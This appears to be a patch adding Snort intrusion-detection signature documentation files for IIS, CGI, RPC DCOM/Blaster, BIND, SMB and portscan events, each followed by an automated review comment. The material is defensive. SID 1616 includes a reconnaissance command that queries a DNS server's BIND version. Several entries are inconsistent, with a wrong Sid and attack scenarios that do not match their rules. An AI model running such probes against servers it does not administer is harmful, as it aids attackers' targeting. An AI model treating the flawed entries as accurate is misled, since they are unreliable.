+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
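Review bot: this document does not say which IIS vulnerability SID 1035 detects; Detailed Information only states that "Many known vulnerabilities exist for this platform", and Additional References is empty. Suggest naming the request pattern the rule matches so an analyst can triage the event. Minor: "attackers choosing" should be "attacker's choosing".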
--- /dev/null
+++ b/doc/signatures/1140.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1140
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
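Review bot: apart from the Sid, this file is identical to 1125.txt in this patch, so it gives an analyst no way to tell what SID 1140 matches as opposed to SID 1125; each should name the specific request pattern or application its rule detects, and Additional References should not be empty for a "known vulnerability".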
--- /dev/null
+++ b/doc/signatures/100000492.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000492
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "DeluxeBB" application running on a webserver. 
+Access to the file "newpm.php" using a remote file being passed as the 
+"templatefolder" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "templatefolder" parameter in the "newpm.php" script 
+used by the "DeluxeBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DeluxeBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
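Review bot: as with the other remote file include documents in this patch, the third paragraph of Detailed Information and the Attack Scenarios section describe credential-validation weaknesses rather than the remote file include via "templatefolder" in "newpm.php" that the Summary describes; suggest replacing them with an RFI scenario. "ona web server" should be "on a web server".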
--- /dev/null
+++ b/doc/signatures/1771.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1771
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+application or service that may violate a corporate security policy.
+
+--
+Impact:
+This may be a violation of corporate policy since some applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation. In
+some instances this event may indicate behavior contrary to best
+security practices.
+
+--
+Detailed Information:
+This event may indicate a violation of corporate policy. It may also
+indicate the use of services or applications that may be the antithesis
+of best security practices.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+Violation of corporate security policy can manifest serious risk to
+company assets.
+
+--
+Ease of Attack:
+Not applicable
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure adherence to best security practices and strict adherence to
+corporate policy
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
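Review bot: the Summary is a sentence fragment: "This event is generated when network traffic indicating the use of an application or service that may violate a corporate security policy." has no main verb. Suggest "This event is generated when network traffic indicates the use of an application or service that may violate a corporate security policy." The document also never names the application or service SID 1771 detects, which leaves the Corrective Action "Ensure adherence to best security practices" with nothing concrete for the reader to act on.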
--- /dev/null
+++ b/doc/signatures/3415.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3415
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
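Review bot: this file duplicates 3324.txt word for word apart from the Sid, including the mismatch between Attack Scenarios ("overly long filename via a network share") and Detailed Information (malformed RPC request to an RPC port) and the "Expoit" typo; please fix both copies, and consider stating how 3415 differs from 3324 (for example which RPC interface or transport it covers) so the two documents are not interchangeable.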
--- /dev/null
+++ b/doc/signatures/1505.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1505
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
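Review bot: this file is identical to 892.txt except for the Sid; "ona web server" should be "on a web server" in both, and the long unwrapped line ending "exploited by the attacker." should be wrapped like the rest of the paragraph. Neither document names the CGI application its rule matches.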
--- /dev/null
+++ b/doc/signatures/1299.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1299
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) ttdbserverd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port ttdbserverd is using.  Attackers can also learn what versions of the ttdbserverd protocol are accepted by ttdbserverd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as ttdbserverd run.  The ttdbserverd RPC service, more commonly known as the ToolTalk database server, allows applications used in Common Desktop Environment (CDE) to communicate.  The ToolTalk service receives ToolTalk messages created and sent by applications and delivers them to the appropriate recipient applications.  The ToolTalk database server comes enabled on hosts with CDE.  Multiple vulernabilities have been associated with the ToolTalk database server. 
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where ttdbserverd runs.  This may be a precursor to accessing ttdbserverd.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access ttdbserverd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for ttdbserverd, not probes of the ttdbserverd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the ttdbserverd service itself. An attacker may attempt to go directly to the ttdbserverd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0717
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0003
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0687
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1075
+
+
+--
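Review bot: typo in Detailed Information, "vulernabilities" should be "vulnerabilities". Ease of Attack says "Easy." where the other documents in this patch use "Simple."; suggest the consistent wording. There are also two consecutive blank lines before the closing separator.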
--- /dev/null
+++ b/doc/signatures/121-4.txt
@@ -0,0 +1,98 @@
+
+
+Rule:
+
+--
+Sid:
+121-4
+
+--
+Summary:
+This event is generated when the pre-processor flow-portscan detects
+network traffic that may constitute an attack. Specifically a sliding
+scale talker limit exceeded event was generated.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the flow-portscan pre-processor detects
+network traffic that may consititute an attack.
+
+The flow-portscan pre-processor uses a flow based technique to identify
+portscanning in one-to-many and many-to-one scenarios based on flow
+creation in the flow pre-processor.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.flow-portscan in the docs directory
+of the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+detailed instructions and examples on how to tune and use the
+pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Chris Green <cmg@snort.org>
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
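Review bot: The Corrective Action line "Apply any appropriate vendor supplied patches as appropriate." says "appropriate" twice; suggest "Apply vendor supplied patches to the scanned hosts where appropriate." The False Positives entry tells the reader to tune the pre-processor so it ignores an authorised audit but does not say where the tuning options live; Detailed Information already points at README.flow-portscan for tuning instructions, so repeat that pointer here rather than leaving the analyst to hunt for the ignore settings.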
--- /dev/null
+++ b/doc/signatures/701.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+701
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
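Review bot: Affected Systems is left empty, which every other entry in this patch fills in; either list the product the rule targets (the Summary says "Microsoft SQL", which should read "Microsoft SQL Server") or state that all versions are affected. Additional References is also empty although the Summary speaks of a "known vulnerability"; a Bugtraq or CVE link would let the reader check which one the rule was written against.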
--- /dev/null
+++ b/doc/signatures/1540.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1540
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
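Review bot: The product name is written "ColdFusion" in Summary and Affected Systems but "Coldfusion" in Detailed Information; use one spelling. "attackers choosing" in Impact needs the possessive ("attacker's choosing"). Additional References is empty even though Detailed Information says "Many known vulnerabilities exist for this platform"; at least one advisory link would help an analyst triage the event.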
--- /dev/null
+++ b/doc/signatures/1141.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1141
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
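Review bot: Nothing in this entry says what the rule actually matches; Summary, Detailed Information and Attack Scenarios are generic web-server boilerplate and Additional References is empty, so an analyst who sees sid 1141 fire cannot tell which product or request is involved. Suggest naming the matched URI or product in Summary and adding a reference link. "attackers choosing" in Impact should be "attacker's choosing".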
--- /dev/null
+++ b/doc/signatures/946.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+946
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
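Review bot: Additional References is empty although the Summary names a specific product (Microsoft FrontPage Server Extensions) and Detailed Information says many known vulnerabilities exist for it; add the vendor bulletin or CVE the rule was written against so the "known vulnerability" in the Summary is identifiable. "attackers choosing" in Impact should be "attacker's choosing".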
--- /dev/null
+++ b/doc/signatures/1616.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1616
+
+--
+Summary:
+This event is generated when an attempt is made to query version.bind on your DNS server.
+
+--
+Impact:
+Reconnaissance. This may indicate which version of BIND the server is running.
+
+--
+Detailed Information:
+An attacker can query a DNS server for the version of BIND running.  Some versions of BIND, by default, respond to these queries while BIND version 9; by default, does not.  A response to this query can assist an attacker in discovering servers that are potentially vulnerable to exploits associated with specific versions of BIND. 
+
+--
+Affected Systems:
+All versions of BIND.
+
+--
+Attack Scenarios:
+An attacker can execute this query to find DNS servers running specific versions of BIND.
+
+--
+Ease of Attack:
+Simple. Use the Unix command 'dig @ns.com version.bind txt chaos' 
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Remove the ability to retrieve the version.bind chaos record via configuration options.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10028
+
+Arachnids::
+http://www.whitehats.com/info/IDS278
+
+--
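Review bot: In Detailed Information the sentence "Some versions of BIND, by default, respond to these queries while BIND version 9; by default, does not." is broken by the semicolon and asserts BIND 9's default behaviour without a citation; rewrite as "while BIND version 9, by default, does not" and either cite the BIND documentation or soften the claim, since neither of the two Additional References covers server defaults. Corrective Action should name the named.conf option the administrator has to set rather than saying "via configuration options". The "Arachnids::" heading has a doubled colon.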
--- /dev/null
+++ b/doc/signatures/2350.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2192
+
+--
+Summary:
+This rule no longer generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+This rule now uses flowbits and can be set to generate an event by
+modifying the rule slightly to remove the "flowbits:no_alert;" option.
+When traffic is detected that attempts to bind to the ISystemActivator
+object in MS RPC DCOM communications this rule now activates sids 2351
+and 2352 to detect exploits against this service. Cool huh?
+
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
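Review bot: The Sid block says 2192 but the file is doc/signatures/2350.txt, and Detailed Information says this rule sets the flowbit that sids 2351 and 2352 check, so the Sid line should read 2350. Detailed Information also ends with "Cool huh?", which does not belong in reference documentation; drop it. Attack Scenarios ("a request for a file with an overly long filename via a network share") describes a different attack from the malformed ISystemActivator RPC request the rest of the entry describes; replace it with a scenario that matches the DCOM request. Typos: "Expoit" in Ease of Attack, "propogate" in Corrective Action, and "Billy/Blaster" should use the worm name given by the Symantec reference (W32.Blaster).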
--- /dev/null
+++ b/doc/signatures/1507.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1507
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
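Review bot: "running ona web server" in Detailed Information is missing a space ("on a web server"). The entry is otherwise generic CGI boilerplate, identical to the 1205.txt entry later in this patch, with no reference link and nothing saying which CGI script the rule matches; add the script name to Summary and a Bugtraq or CVE link so the two entries can be told apart.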
--- /dev/null
+++ b/doc/signatures/2998.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2998
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
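Review bot: Impact reads only "Serious."; Detailed Information already states the concrete effect (Denial of Service from a remote shutdown), so put that in Impact. Attack Scenarios then claims the attacker "may gain complete control over the affected system", which nothing else in the entry supports; either explain how a shutdown request leads to that or reduce it to the DoS. Corrective Action's "Disallow remote registry manipulation" should say how it relates to an SMB shutdown request, since the registry is not mentioned anywhere else in the entry.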
--- /dev/null
+++ b/doc/signatures/100000668.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000668
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "pheader.php" using a remote file being passed as the 
+"theme_root" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "theme_root" parameter in the "pheader.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
